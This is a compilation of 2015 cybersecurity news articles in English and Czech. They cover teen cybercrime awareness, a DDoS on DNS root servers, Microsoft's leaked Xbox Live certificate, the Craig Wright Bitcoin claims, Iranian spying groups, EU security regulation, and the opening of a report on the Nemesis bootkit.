The campaign #CyberChoices was launched by the UK Government to educate parents on common forms of cyber crime, the lack of knowledge has a significant impact of the perception on cybercrime for their son. Malware, Distributed Denial of Service (DDoS), ransomware, Dark Web are unknown terms for parents, but not for their children and the risk of being involved in criminal activities is high.

“The campaign aims to educate parents on the common forms of cyber crime potentially undertaken by teenagers. In an operation targeting users of Lizard Stresser, a Distributed Denial of Service (DDoS) tool which can knock websites offline by flooding them with data, all of the seven people arrested were under the age of 18.” reads the post published by the Agency

Younger hackers have also increasingly used Remote Access Trojans (RATs) that allow them to remotely control the PC of their victims, the agency revealed that youngest purchaser of a RAT was just 12 years old.

“Other types of malicious software called Remote Access Trojans (RATs) can also be popular amongst younger users. They allow people to remotely monitor and take full control of another computer. During an operation targeting users of the Blackshades RAT the average age of the 22 people arrested was 18, with the youngest purchaser of Blackshades just 12 years old.”

Giving a look to some of the most glamorous security breached, like the attack against the British IPS TalkTalk and the Christmas attack against PSN network and XBox live network conducted by Lizard Squad hacking crew it is possible to note that the groups were composed of young hackers, often minors …

It’s time to act!

Someone Just Tried to Take Down Internet's Backbone with 5 Million Queries/Sec
Someone just DDoSed one of the most critical organs of the Internet anatomy – The Internet's DNS Root Servers.
Early last week, a flood of as many as 5 Million queries per second hit many of the Internet's DNS (Domain Name System) Root Servers that act as the authoritative reference for mapping domain names to IP addresses and are a total of 13 in numbers.
The attack, commonly known as Distributed Denial of Service (DDoS) attack, took place on two separate occasions.
The first DDoS attack to the Internet's backbone root servers launched on November 30 that lasted 160 minutes (almost 3 hours), and the second one started on December 1 that lasted almost an hour.
Massive Attacks Knocked Many of the 13 Root Servers Offline
The DDoS attack was able to knock 3 out of the 13 DNS root servers of the Internet offline for a couple of hours.
Also Read: Secure Email Service Paid Hackers $6000 Ransom to Stop DDoS Attacks.
The request queries fired at the servers were valid DNS messages addressed towards a single domain name in the first DDoS attack, and the second day's DDoS attack addressed towards a different domain name.
According to the analysis published by the root server operators on Tuesday, each attack fired up to 5 million queries/second per DNS root name server that was enough to flood the network and cause timeouts on the B, C, G, and H root servers.
There is no indication of who or what was behind the large-scale DDoS attacks because the source IP addresses used in the attacks were very well distributed and randomized across the entire IPv4 address space.
Interesting Read: Record-breaking 1Tbps Speed achieved Over 5G Mobile Connection.
However, the DDoS attacks did not cause any serious damage to the Internet, but a mere delay for some of the Internet users who made DNS queries through their web browser, FTP, SSH, or other clients.
This Smart Design Defends DNS Protocol Infrastructure
The motive for such attacks is still unclear because disabling or knocking down a root server won't have a severe impact on the Internet as there are several thousand of other DNS servers managing DNS queries.
"The DNS Root Name Server system functioned as [it's] designed, demonstrating overall robustness in the face of [massive] traffic floods observed at numerous DNS Root Name Servers," Root Server Operators says (PDF), referring to the backup system employed by DNS servers.
Like the Internet, DNS is constructed on a mesh-like structure, so if one server doesn't respond to a request, other servers step in and provide a DNS query result.
According to the DNS root server operators, the attack was not the result of a reflective DDoS attack in which open and misconfigured DNS is used to launch high-bandwidth DDoS attacks on the target.
Recommended Read: Over 20Gbps DDoS attacks Now Become Common for Hackers.
Despite all the facts, any attack on the critical infrastructure of the Internet is taken extremely seriously.
The DNS root server operators recommended the Internet Service Providers (ISPs) to implement Source Address Validation and BCP 38, an Internet Engineering Task Force standard that helps defeat IP address spoofing.

xboxlive digital certificate exposed opens users to MITM attacks

Microsoft has issued an advisory to notify customers that the private keys for an SSL/TLS digital certificate for * have been disclosed.
According to a security advisory published by Microsoft, the company is propagating a new certificate for the * domain because it has “inadvertently disclosed” the certificate’s contents.

Microsoft confirmed the accidental disclosure of the digital certificate private keys for the above domain, a circumstance that opens customers to man-in-the-middle attacks, although the certificate “cannot be used to issue other certificates, impersonate other domains, or sign code”.

The Xboxlive certificate is included in all supported releases of Microsoft Windows.

“Microsoft is aware of an SSL/TLS digital certificate for * for which the private keys were inadvertently disclosed. The certificate could be used in attempts to perform man-in-the-middle attacks. It cannot be used to issue other certificates, impersonate other domains, or sign code. This issue affects all supported releases of Microsoft Windows. Microsoft is not currently aware of attacks related to this issue. ” reads the Microsoft advisory.

Microsoft confirmed that revocation of the Xboxlive SSL server certificates should propagate to everybody automatically, however. The company hasn’t provided additional information on how many people may have seen the certificate, but it is unlike that the accidental disclosure has been exploited in attacks in the wild.


Users of Windows have nothing to do, meanwhile users of Vista, Windows 7, Windows Server 2008 or Windows Server 2008 R2 will need to enable the automatic certificate updater.

Users not covered by the automatic update should add the compromised certificate to the list of untrusted certificates by using the Certificates MMC snap-in.

After applying the update, how can users verify the certificates in the Microsoft Untrusted Certificates Store?

For Windows Vista, Windows 7, Windows Server 2008, and Windows Server 2008 R2 systems that are using the automatic updater of certificate trust lists (see Microsoft Knowledge Base Article 2677070 for details), and for Windows 8, Windows 8.1, Windows RT, Windows RT 8.1, Windows Server 2012, Windows Server 2012 R2, Windows 10, and Windows 10 Version 1511 systems, users can check the Application log in the Event Viewer for an entry with the following values:

Source: CAPI2
Level: Information
Event ID: 4112
Description: Successful auto update of disallowed certificate list with effective date: Tuesday, December 1, 2015 (or later).
For systems not using the automatic updater of certificate trust lists, in the Certificates MMC snap-in, verify that the following certificate has been added to the Untrusted Certificates folder:

Certificate Issued by Thumbprint Microsoft IT SSL SHA2 ‎8b 2e 65 a5 da 17 fc cc bc de 7e f8 7b 0c 0e d5 d0 70 1f 9f

It Works! Google's Quantum Computer is '100 Million Times Faster' than a PC

It Works! Google's D-Wave 2X Quantum Computer is '100 Million Times Faster'
Announcing the results of its experiment, Google says Quantum Computer is More than 100 Million times faster than a regular PC.
Two years ago, Google and NASA (National Aeronautics and Space Administration) bought a D-Wave 2X quantum computer, which they have been experimenting at the U.S. space agency's Ames Research Center in Mountain View, California for the past two years.
The goal is to create a better way to solve highly complex problems in seconds rather than years.
Also Read: Fastest Operating System for Quantum Computing Developed By Researchers
Now, a Google's Quantum AI team appears to have announced the results of its latest test on D-Wave 2X quantum computer, demonstrating that quantum annealing can outperform simulated annealing by over 108 times – that is 100,000,000 times faster.
What is Quantum Computers?
Google's D-Wave 2X Quantum Computer
Quantum computers can theoretically be so much faster because they take advantage of quantum mechanics. While traditional computers use the "bits" to represent information as a 0 or a 1, quantum computers use "qubits" to represent information as a 0, 1, or both at the same time.
In turn, this allows Quantum computers to achieve a correct answer much faster and efficiently through parallel processing.
Now, the Google Quantum Artificial Intelligence Lab has announced that its D-Wave machine is considerably much faster than simulated annealing – quantum computation simulation on a classical computer chip.
"We found that for problem instances involving nearly 1000 binary variables, quantum annealing significantly outperforms its classical counterpart, simulated annealing. It is more than 108 times faster than simulated annealing running on a single core," said Hartmut Neven, Google's director of engineering.
Also Read: Web Encryption Protocol That Even Quantum Computers Can't Crack
Google: Our Quantum Machine is 100 Million Times Faster
Google has also published a paper [PDF] on the findings, claiming that the team was able to perform a calculation with the quantum computing technology that was significantly faster than a conventional computer with a single core processor.
Google's D-Wave 2X Quantum Computer
The researchers emphasized that their research on quantum computing is still in the early stages and has yet to be commercialized which could take decades.
"While these results are intriguing and very encouraging, there is more work ahead to turn quantum enhanced optimization into a practical technology," Neven wrote.
However, the team of Google and NASA researchers announced on Tuesday that the tests on D-Wave machines using Quantum Monte Carlo algorithm simulates running an optimization problem on ordinary silicon, and again the results were more than 100 Million times faster than a conventional computer.

The North American cyber-criminal underground it’s easy to access!

According to a new report published by Trend Micro, the North American cyber criminal underground is very easy to access.
The new report released by Trend Micro reveals that the cyber criminal underground market in North America isn’t so hidden like in other countries.

“It doesn’t exist in the dark web as much as other undergrounds do, or practice as much security,” ,”Essentially, it’s become a gun show for everyone as long as they can participate and are willing to pay.” says Tom Kellermann, chief cybersecurity officer at Trend Micro.

“The North American Underground primarily caters to customers within the region–users based in the United States (US) and Canada. Unsurprisingly, most of the offerings (stolen accounts, products and services, and fake documents) are US based. This is consistent with what we see in the Japanese1 and Brazilian2 undergrounds and suggests that US-based information is most sought after in it.” states the report.

Gigging in the underground markets users can buy, guns, drugs, hacking services, bulletproof vests, and even money laundering services or maybe hire a murder.

It could be useful to help different criminal activities, tradition organized criminals are becoming “cyber aware” and now do their business through the internet.

“We’ve done studies and exposes of the most significant undergrounds in the world,” “The U.S. underground doesn’t practice operational security. They’ve essentially become a shopping mall.”

Of course, law enforcement is aware of this trend and probably in the future more of these underground markets in response to the increasing pressure of the authorities will migrate to the darkweb, where they would be more protected.

In the decade of 2000, law enforcement agencies were doing very well, and almost every U.S cyber-criminal underground was dismantled, but in the last 3 years, the criminal underground market did a came back and its getting stronger.

“It’s larger because it’s providing a wider multiplicity of goods and services,”. “They’re there for the drugs, weapons, passports, stolen cards, and murder for hire.

Looking at the numbers, it can be seen that drugs it’s the popular item in the criminal underground ecosystem, getting 62% of the market, but also its interesting to see that stolen data dumps account gets 16%, fake documents 4%, weapons 2%, and murder for hire 1%.

North America criminal Underground Trend Micro

North America criminal Underground Trend Micro drugs

North America criminal Underground Trend Micro drugs

In terms of “murder for hire“, you have some options available like a simple beating for $3,000, or an “accidental death” for $900,000.

The last bit that we hadn’t covered yet was the crimeware that takes 15% of the market and include things like, buying malware, hacking services.

Other best seller besides drugs are malware, and the service provider for the malware does his homework, encrypting the malware multiple times as needed until the malware can pass undetectable through the endpoint products.

“it’s why targeted attacks have become so prevalent,”,”They will make sure their attacks cannot be stopped by perimeter defenses.”

North America criminal Underground Trend Micro crimaware offer

North America criminal Underground Trend Micro stolen card data

Talking about differences in countries, Kellerman explains:

“In the Russian or Chinese underground, they won’t sell you the back door into the system,”,”That’s a North American phenomenon. It’s like, I broke into a house last night, I made a duplicate of the key. You want it, you got it.”

One of the main reasons why nowadays we read about the cyber criminal underground in the news is because doing illegal activities in the cyberspace is becoming even more easy and cheap.

The model of sale known as crime-as-a-service is attracting the organized crime and is allowing a rapid growth of illegal activities online.

Is he Satoshi Nakamoto? Australian Police raid home of the alleged Bitcoin father

While media announced to have found the real identity of the Bitcoin creator Satoshi Nakamoto, Australian police raided his home in Sidney.
A few hours after the media indicated the Australian expert Craig Steven Wright as the possible man behind the popular name Satoshi Nakamoto, the anonymous creator of Bitcoin, the Australian Police raided his home in Sydney.

Wright was identified as the mysterious creator of Bitcoin, Satoshi Nakamoto, based on leaked transcripts of legal interviews and a number of emails and blog posts.

At the time I was writing, there is no confirmation about the identity of the Bitcoin creator. A dozen of police agents raided Wright’s home on Wednesday afternoon searching, they broke down the door and ransacked the house.

It is important to clarify that the raid seems to be not associated with the recent revelation on the Satoshi Nakamoto’s real identity, the Guardian who reported the news states that the operation is linked to the Australian Taxation Office investigation

“On Wednesday afternoon, police gained entry to a home belonging to Craig Wright, who had hours earlier been identified in investigations by Gizmodo and Wired, based on leaked transcripts of legal interviews and files. Both publications have indicated that they believe Wright to have been involved in the creation of the cryptocurrency.” reported the Guardian.


The Australian Federal police issued an official statement explaining that the raids were not related to the bitcoin claims.

“The AFP can confirm it has conducted search warrants to assist the Australian Taxation Office at a residence in Gordon and a business premises in Ryde, Sydney. This matter is unrelated to recent media reporting regarding the digital currency bitcoin.”

One officer told Reuters they were “clearing the house”, Reuters also reported that also the Wright’s offices have been raided.

The emails cited by Gizmodo don’t state that Wright is a founder of the Bitcoin, instead, suggest his involvement in the development of the cryptocurrency. Wright was trying to persuade the Australian Taxation Office to tax his Bitcoin holdings as a currency and not as an asset.
Another thing that suspicious experts is that Nakamoto reportedly has some 1.1 Million Bitcoins to his name in a trust fund that amounts to roughly 455 Million in US Dollars, it is exactly the same amount that Wright is believed to own.

“An email to a Clayton Utz lawyer identified as Wright’s lawyer in the ATO transcripts was sent from an address linked to Nakamoto and is signed “Craig (possibly).” “The email discussed whether contact should be made with Australia’s then assistant treasurer Arthur Sinodinos in January 2014 over the regulatory issues in Australia surrounding bitcoin.” continues the Guardian.

“The treatment of bitcoin for tax purposes in Australia has been the subject of considerable debate. The ATO ruled in December 2014 that cryptocurrency should be considered an asset for capital gains tax purposes.”

The Australian Taxation Office authorities will continue its investigation, for sure they will clarify if Wright is the mysterious Satoshi Nakamoto, or he is the wrong person.

Chrome pro Android bude blokovat podvodné stránky

9.12.2015 Mobilní
Pokud jste někdy viděli tu děsivou červenou obrazovku v Google Chrome, která vám brání navštěvovat nebezpečné webové stránky, a chcete mít podobnou funkci také na svém mobilním telefonu, máte štěstí: Google rozšiřuje technologii bezpečného surfování Safe Browsing také na Android.

Safe Browsing je nyní integrován do služeb Google Play a aplikace stažené z internetového obchodu jej budou využívat. Jako první jej do sebe začlení Chrome for Android.

V PC verzi Chrome vás Safe Browsing chrání před stránkami známými tím, že obsahují malware, viry nebo internetové podvody. Pokud jste pravidelnými uživateli mobilního internetu, nejspíše vás neustále prohlížeč zahlcuje upozorněními, že váš telefon nefunguje správně, baterie se vybíjí moc rychle nebo že zařízení není zabezpečeno. Všechna tato upozornění se vás snaží přimět nainstalovat aplikaci, která má údajně tyto problémy vyřešit.

Ačkoliv Chrome for Android na rozdíl od své počítačové verze neobsahuje podporu pro rozšíření, což znamená, že nenabídne žádné blokování reklam, uživatelé se snad budou moci spolehnout alespoň na to, že se zbaví klamavých reklam a nebezpečných stránek.

Podle Googlu nebyla implementace Safe Browsing snadná. Mobilní data mají totiž omezenou šířku pásma, obzvláště v některých oblastech světa. Proto je seznam nechtěných stránek v aplikaci vždy co nejaktuálnější a co nejužší.

„Velká část útoků se děje pouze ve vybraných částech světa, takže informace chránící dotčená zařízení vysíláme pouze do těch regionů, ve kterých se nachází,“ uvedl Google na svém bolgu. „Také se snažíme posílat jako první informace o těch nejnebezpečnějších stránkách.“

Safe Browsing by měl podle jeho vývojářského týmu také spotřebovávat co nejméně kapacity procesoru a mobilní paměti. Díky tomu by měl šetřit baterii. Uživatelé mobilních telefonů s operačním systémem Android si mohou zkontrolovat, zda jejich zařízení disponuje službou Safe Browsing v Nastavení soukromí.

Bitcoin Creator 'Satoshi Nakamoto' Unmasked! An Australian Man 'Craig Wright' identified...
Breaking Update: Police Raid alleged Bitcoin Creator Craig Wright's Home in Sydney.
Yes, Satoshi Nakamoto, the mysterious creator of the Bitcoin digital cryptocurrency has possibly been identified as an Australian entrepreneur, according to investigations independently done by Wired and Gizmodo.
His name is Craig Steven Wright… least based on some convincing evidence shown by both the publications.
Bitcoin is a revolutionary virtual currency developed around Blockchain, a complicated cryptographic protocol and a global computers network that oversees and verifies which Bitcoins have been spent by whom.
The identity of the ones spending Bitcoins are extremely difficult to trace because of its anonymous nature, therefore, are very popular among criminals.
Also Read: Meet The World's First Person Who Hacked His Body to Implant a Bitcoin Payment CHIP
Satoshi Nakamoto is not only the father of an entire economy worth Billions of dollars, but also a multi-multi-millionaire himself.
Some Evidence that... Satoshi Nakamoto = Craig Steven Wright
The 44-year-old Australian academic – described as a "climate-change denier, a serial entrepreneur and an eccentric" – fits the profile of Bitcoin's creator in nearly every detail.
Wired claimed that Wright knew about Bitcoin before it was ever made public in 2009. We can say this based on the following evidence:
Wright apparently published some blog posts sharing and seeking expertise on developing crypto currencies just before the launch of Bitcoin.
His PGP keys for email were previously linked to someone identifying themselves as being Satoshi Nakamoto.
A blog post announcing the launch of Bitcoin, which was then deleted and replaced with a short note saying "the best way to hide is right in the open."
The Documents that were either "Leaked" or "Hacked" by an anonymous source close to Wright include e-mails dating back to 2008 — before the creation of Bitcoin — in which Wright discusses his work on Bitcoin.
Wright has 1.1 Million Bitcoins Worth $400
As evidence, the report cites a Legal Contract that Mr. Wright and his American business partner, Dave Kleiman (computer forensics expert) who died in 2013, were involved in the development of the Bitcoin digital currency.
According to the contract, Wright and Kleiman allegedly have access to 1.1 Million Bitcoins. This sum, worth about $400 Million today, is the same amount that Nakamoto is believed to own.
Also Read: World's 9 Biggest Banks to adopt Bitcoin's Blockchain Technology.
Leaked Conversation b/w Wright and his Lawyer
Another leaked document shows conversations between Wright and his lawyers in which Wright said:
"I did my best to try and hide the fact that I have been running Bitcoin since 2009;" however "by the end of this I think half the world is going to bloody know."
Shortly after Wired published its report, Wright blog was taken offline as well as his Twitter account went deleted altogether.
Wright's Ex-Wife Knew his Research on Digital Money
The Gizmodo story includes interviews with Wright's ex-wife Lynn, who confirmed that her husband worked on digital currency ideas many years ago, but noted that he 'didn’t call it Bitcoin' at first.
Another reporter approached his current wife, who is a director at his company DeMorgan, and asked if Wright was the inventor of Bitcoin, Guess What?
She smiled and closed the door, declining to comment on it.
Wright Announced World's First Bitcoin Bank
Wright publicly announced last year his plans to establish the "World's First Bitcoin Bank" and described himself as CEO DeMorgan company.
DeMorgan – a company "focused on alternative currency, next generation banking and educational products with a focus on security and creating a simple user experience."
However, evidence can go wrong. Various attempts to prove Satoshi Nakamoto's identity in the past have proved unsuccessful.
Also Read: 'Bitcoin is Now Officially a Commodity' — US Regulator Declared
Last year, Newsweek created headlines worldwide, claiming to "outed" the creator of Bitcoin 'Satoshi' as being a 64-year-old Japanese-American, who lives near Los Angeles.
However, Wright's name has never appeared on the list of the possible creators of Bitcoin. So this time as well, the whole story could be nothing but just a big Hoax and the unverified leaked documents could also be faked in whole or in part.

Police Raid alleged Bitcoin Creator Craig Wright's Home in Sydney
Just hours after the Australian man 'Craig Steven Wright' outed as the possible real identity of Satoshi Nakamoto, the anonymous creator of Bitcoin, Australian Police raided his home in Sydney.
Over 10 police officers raided Wright's home in the Sydney suburbs on Wednesday afternoon. They forcefully opened the door, and 'started searching the cupboards and surfaces of the garage.'
However, the Sydney police raid at Wright's home is not associated with the claims of his being involved in creating Bitcoins, rather related to the Australian Taxation Office investigation, the Guardian reported.
Wright was recently identified as the mysterious creator of Bitcoin, based on leaked transcripts of legal interviews and a number of emails and blog posts.
However, neither Dr. Wright nor anyone else has publicly confirmed the real identity of the founder of Bitcoin Satoshi Nakamoto.
In a statement, the Australian Federal Police (AFP) officers said the raids weren't at all associated with the recent Bitcoin claims on Wright.
"The AFP can confirm it has conducted search warrants to assist the Australian Taxation Office at a residence in Gordon and a business premises in Ryde, Sydney," the police said. "This matter is unrelated to recent media reporting regarding the digital currency bitcoin."
Wright appears to be persuading the Australian Taxation Office to tax his Bitcoin holdings as a currency and not as an asset.

Nakamoto reportedly has some 1.1 Million Bitcoins to his name in a trust fund that amounts to roughly 455 Million in US Dollars — the same amount that Wright is believed to own.
The recent investigations hinted at a direct link between Wright and Nakamoto, but the evidence could be fake in whole or part and there is a possibility that Wright could also be the wrong man.
Maybe the Australian Taxation Office authorities will have the better luck in figuring out the mystery — The Face behind Bitcoin.

Cadelle and Chafer, Iranian hackers are tracking dissidents and activists

Symantec has uncovered Cadelle and Chafer groups, two Iran-based hacking teams that are tracking dissidents and activists.
According to a new report published by Symantec. Iranian hackers have been using malware to track individuals, including Iranian activists and dissidents.

The researchers have identified two groups of Iran-based hackers, dubbed Cadelle and Chafer, which were distributing data stealer malware since at least mid-2014. The experts uncovered the command-and-control servers explaining that registration details indicate the Iranian hackers may have been operating since 2011.

There are a number of indicators that suggest both groups are based in Iran, the Cadelle and Chafer teams are most active during the day time within Iran’s time zone and primarily operate during Iran’s business week (Saturday through Thursday).

“Two Iran-based attack groups that appear to be connected, Cadelle and Chafer, have been using Backdoor.Cadelspy and Backdoor.Remexi to spy on Iranian individuals and Middle Eastern organizations.” states a report published by Symantec.

The hackers used custom-made malware that isn’t particularly sophisticated, the attackers remained under the radar for a long time and gained access to “an enormous amount of sensitive information.”

Let’s give a close look to the malware used by the Iran-based hackers, Cadelle uses a piece of malware called backdoor.cadellespy, meanwhile Chafer relies uses on the backdoor.remexi.

The researchers collected evidence to suggest that the two teams may be connected, Chafer was used to compromise web servers, likely through SQL injection attacks, to drop Backdoor.Remexi onto targeted systems. The Remexi botnet was used to gain control over the victim’s PC stealing user login credentials to use in lateral movements.

The analysis of Cadelspy’s file strings revealed that some dates use the Solar Hijri calendar format, a format very common in Afghanistan and Iran.

Most of affected organizations are based in the Middle East region in countries such as Saudi Arabia and Afghanistan, while one of the victim organization is located in the US.

Cadelle and Chafer malware infections

Both groups are small, the experts at Symantec speculate they are composed of five to 10 people, but they don’t share the same attack infrastructure.

“The Cadelle and Chafer groups also keep the same working hours and focus on similar targets. However, no sharing of C&C infrastructure between the teams has been observed.” reads the report.

“If Cadelle and Chafer are not directly linked, then they may be separately working for a single entity. Their victim profile may be of interest to a nation state.”

Another interesting aspect related to the two Iran-based groups, is that several machines resulted infected with both Cadelyspy and Remexi malware, and the infections occurred within minutes of one another.

“One computer that was infected with both Cadelspy and Remexi was a system that ran a SIM card editing application,” Symantec wrote. “Other compromised computers included those belonging to web developers or are file and database servers.”

The malware also targeted people using anonymous proxies, used by activists and dissidents to hide their identity online and avoid censorship.

“Reports have shown that many Iranians avail of these services to access sites that are blocked by the government’s Internet censorship,” Symantec wrote. “Dissidents, activists, and researchers in the region may use these proxies in an attempt to keep their online activities private.”

Symantec confirmed that Cadelle and Chafer are still active today and will continue their operations.

EU regulation to Impose rules on firms to improve cybersecurity

EU member states and lawmakers have prepared a first draft of the EU regulation in cyber security that will force companies to improve security and report security breaches and cyber incidents.
EU member states plan to impose rules in the company to prevent cyber attacks, on Monday they agreed the first draft of the regulation that will force companies in various industries to increase cyber security and disclose any incident reporting it to the authorities.

The regulation will impact any sector, including financial, health care and transportation.

“This agreement is a major step in raising the level of cybersecurity in Europe, one of the objectives of the EU cybersecurity strategy and a cornerstone in our efforts towards a Digital Single Market” the European’s Union’s digital commissioner Guenther Oettinger wrote on his blog.
The EU regulation will oblige IT giants, Internet and cloud service providers, and online marketplaces like Amazon, eBay, and Google to ensure the safety of their infrastructure and to disclose and share information about major incidents.

In this phase small digital companies will be exempted from the rules, however I believe that the regulation will be adapted to consider in the future also the specific situation of this category of businesses.

EU regulation

As explained by Oettinger, the EU regulation is a necessary action to respond to the cybercrime and mitigate its impact on the economy of the EU.

“Every day, cybercrime and cyberattacks cause major economic damage to European businesses and our economy. This amounts to hundreds of billions of euro each year. Even ordinary families and children cannot escape this risk.” Oettinger says. “I will not sit back and let these criminals and cyber terrorists attack our businesses, intrude into our private lives and destroy trust in our digital economy and society,”

The new EU rules in cyber security will act on three levels:

improving cybersecurity in EU countries by forcing Member States to have a national strategy.
improving cooperation between Computer Security Incident response teams of the State Members and to share information about cyber attacks and risks.
forcing companies that provide essential services (i.e. power companies, financial institutions, transport providers, healthcare and digital infrastructure) to take appropriate security measures and inform the authorities when they suffer a major cyber incident.
“The rules will make digital networks and services more secure and reliable. Consumers will have more confidence in the technologies, services and systems they rely on day-to-day. The EU economy will benefit as sectors that depend on Network and Information Security will be backed up by cybersecurity teams at home and across Europe. Governments and businesses can be confident that digital networks and critical infrastructure such as the electricity, gas and transport sectors can securely provide their essential services at home and across borders. ” continues the post.

The new rules will impact also companies that operate in the IT sectors but that rely on technologies to provide their services, gas and transport sectors “can securely provide their essential services at home and across borders,”.

The EU regulation in cyber security has to be approved by the European Parliament, but cyber security experts believe that the 28 EU member states will accelerate the process for the criticality in the field.

Co vyžadují nové předpisy EU o kybernetické bezpečnosti?

9.12.2015 Bezpečnost
Do konce roku 2017 by měly vstoupit v platnost dva nové právní předpisy EU, které upravují informační bezpečnost a ochranu dat. Zásadním způsobem ovlivní, jak organizace v členských státech EU řeší svou ochranu a jak reportují narušení bezpečnosti a ztrátu dat.

Kyberbezpečnostní směrnice o bezpečnosti sítí a informací (Network and Information Security, NIS) a Nařízení o obecné ochraně údajů (General Data Protection Regulation, GDPR) nějakým způsobem zasáhnout všechny organizace v rámci EU bez ohledu na jejich velikost.

Stanoví standard pro zabezpečení informací a ochranu údajů a sjednotí předpisy v rámci jednotlivých členských států. Snahou je snížit počet bezpečnostních incidentů a úniků dat a osobních údajů.

Kyberbezpečnostní směrnice o bezpečnosti sítí a informací bude vyžadovat zapojení celé řady společností ze soukromého sektoru, které pomohou s realizací nových požadavků na zabezpečení a reporting incidentů.

Směrnice stanoví, že „provozovatelé kritických infrastruktur“ (organizace z oblastí veřejných služeb, dopravy, veřejného sektoru a finančních služeb) nasadí odpovídající opatření pro správu bezpečnostních rizik a hlášení závažných incidentů na vnitrostátní orgány nebo speciální nouzový kybertým.

Nařízení o obecné ochraně údajů (GDPR) sjednotí stávající nařízení o ochraně údajů v zemích EU do jednoho zákona, takže budou jednotné pokyny, jak organizace musí zacházet s osobními identifikačními údaji (Personal Identifiable Information, PII), tedy veškerými informacemi, které umožní přímo či nepřímo identifikovat nějakou fyzickou osobu.

To se bude týkat všech organizací působících v Evropě, a to bez ohledu na to, zda jsou údaje umožňující identifikaci osob uložené uvnitř hranic Evropské unie či nikoliv. Dojde také k rozšíření definice „osobních údajů“, součástí budou i e-mailové adresy, IP adresy a obsah zveřejněný na sociálních sítích.

Co to znamená pro organizace?

Klíčové je, že se tyto směrnice a nařízení stanou vymahatelnými, takže pokud organizace nesplňují NIS nebo GDPR, riskují v případě narušení bezpečnosti přísné sankce. Navrhované pokuty jsou 5 % z celosvětového ročního obratu (v závislosti na segmentu) nebo až 100 milionů EUR.

Nové právní předpisy zvýší odpovědnost organizací, ale zároveň je to pro ně příležitost k přehodnocení stávajících bezpečnostních postupů. Změny v oblasti kyberbezpečnosti mohou ve výsledku pomoci otevřít nové obchodní příležitosti a získat konkurenční výhodu.

Některé z návrhů GDPR odráží směrnici NIS, speciálně pokud jde o zabezpečení systémů a dat, podobně je to i u některých sankcí. Ale GDPR má mnohem více detailů souvisejících s regulací a manipulací s osobními identifikačními údaji (PII) občanů EU.

Na koho se bude GDPR vztahovat?

Podléhat právním předpisům GDPR bude každá organizace nabízející zboží nebo služby v rámci členských států EU. Odstraní se tím současné nejasnosti, zda právní předpisy na ochranu údajů platí v dané zemi nebo regionu. Každá organizace podnikající v rámci EU a manipulující s osobními údaji subjektů EU by měla přijmout taková opatření, která zajistí soulad s předpisy.

„Pokud chtějí organizace minimalizovat rizika, měly by shromažďovat a zpracovávat pouze pro daný účel opravdu nezbytné informace. Nutné je také neuchovávat osobní údaje déle, než je nutné. K tomu mohou pomoci různé automatické politiky, které zajistí, že nepotřebná data jsou ihned bezpečně zničena a vymazána, a nehrozí tak žádný postih,“ říká David Řeháček, marketingový šéf pro Jižní a Východní Evropu ze společnosti Check Point Software Technologies.

Oznámení o narušení bezpečnosti a únicích dat

Aktuální bezpečnostní předpisy pouze navrhují, aby organizace implementovaly „vhodná“ technická bezpečnostní opatření a zvolily odpovídající obchodní postupy, ale už není konkrétně uvedeno, jak přesně postupovat a jak konkrétně by takové bezpečné řešení mělo vypadat. Nicméně ochrana by měla obsahovat uznávaná opatření, jako jsou šifrování dat a firewall, a procesně by organizace měly oznamovat narušení bezpečnosti regulátorům a postiženým jednotlivcům do 72 hodin.

„Počet kyberútoků neustále roste, zvyšuje se jejich sofistikovanost a masivní úniky dat jsou bohužel poměrně časté, takže je pravděpodobné, že počáteční pokuty podle nových nařízení budou velmi vysoké. Proto není možné brát kyberbezpečnost na lehkou váhu,“ dodává Řeháček.

Sankce a jejich vymáhání

V současnosti jsou v zemích Evropské unie velké rozdíly v sankcích a v jejich vymáhání. GDPR tyto rozdíly odstraní a zavede přísné tresty. Navrženy jsou sankce až 100 milionů eur nebo až 5 % celosvětového ročního obratu organizace.

Ochrana osobních údajů bude nedílnou součástí organizace. Organizace musí implementovat bezpečnostní opatření do všech technických a organizačních procesů a postupů hned do samého začátku. S bezpečností je potřeba pracovat už během přípravných fází, aby byla nedílnou součástí firmy na všech úrovních.

Změna v přístupu k dodavatelům

V rámci nové legislativy bude celý dodavatelský řetězec - od dodavatelů k zákazníkům - společně zodpovědný za ochranu dat. Nebude tedy možné převádět odpovědnost za zabezpečení dat. To znamená, že organizace zpracovávající velké množství informací identifikujících osoby, budou muset použít opatření pro zabezpečení dat a kontrolovat i své partnery, aby bylo zaručeno, že také oni zpracovávají osobní údaje bezpečně.

Inspektoři ochrany údajů

Zatím není zřejmé, jestli budou muset organizace podle GDPR jmenovat inspektora ochrany údajů (Data Protection Officer, DPO), který by byl zodpovědný za správu a ochranu interních dat a shodu s předpisy a procesy.

V každém případě musí být organizace připravené, že budou muset interně řešit další zabezpečení, správu dat a reporting. Vzhledem k důležitosti těchto úkolů by takový člověk měl být na vedoucí pozici a měl by být připraven věnovat těmto úkolům většinu svého času.

Nové právní předpisy EU, které upravují oblast kyberbezpečnosti a ochrany dat, budou mít zásadní vliv na způsob, jak mnoho organizací v členských státech EU řeší své zabezpečení a jak informují o incidentech a ztrátě dat. Nicméně organizace by měly brát nové právní předpisy jako příležitost přepracovat svůj přístup ke kyberbezpečnosti, a to nejen v souladu s předpisy, protože posílením bezpečnosti mohou získat konkurenční výhodu.

Nemesis Bootkit — A New Stealthy Payment Card Malware

Another day, another stunning Malware – this time targeting banks, payment card processors, and other financial services.
Security researchers have uncovered a sophisticated payment card malware that executes before the operating system boots, making the malware very difficult to detect and much less remove.
The malware in question is part of "Nemesis" – a malware suite that includes all software programs for capturing screens, transferring files, injecting processes, logging keystrokes, and carrying out other malicious activities on the infected computers.
Nemesis malware family has been seen in the past, targeting banks, ATMs, financial transaction processing, credit unions, and financial business service companies.
Nemesis Bootkit Malware – Reappears even after Re-installation of the OS
The malware with bootkit functionality has been in operation since early this year and has the ability to modify the legitimate VBR (Volume Boot Record) that makes the malware possible to load before Windows starts.
This makes the malicious threat hard to detect and remove using traditional security approaches.
Moreover, the malware resides in a low-level portion of a hard drive.
This makes the malware infection reappears even after the complete reinstallation of the Windows operating system.
"The malware that persists outside of the operating system (OS) requires a different approach to detection and eradication," security analysts from FireEye wrote in a blog post published Monday.
"Malware with bootkit functionality can be installed and executed almost entirely independent of the Windows [OS]. As a result, incident responders will need tools that can access and search raw disks at scale for evidence of bootkits."
How Does the Malware Work?
Early this year, the cyber criminals tweaked Nemesis to include a utility called BOOTRASH that has the ability to modify an infected computer’s boot process.
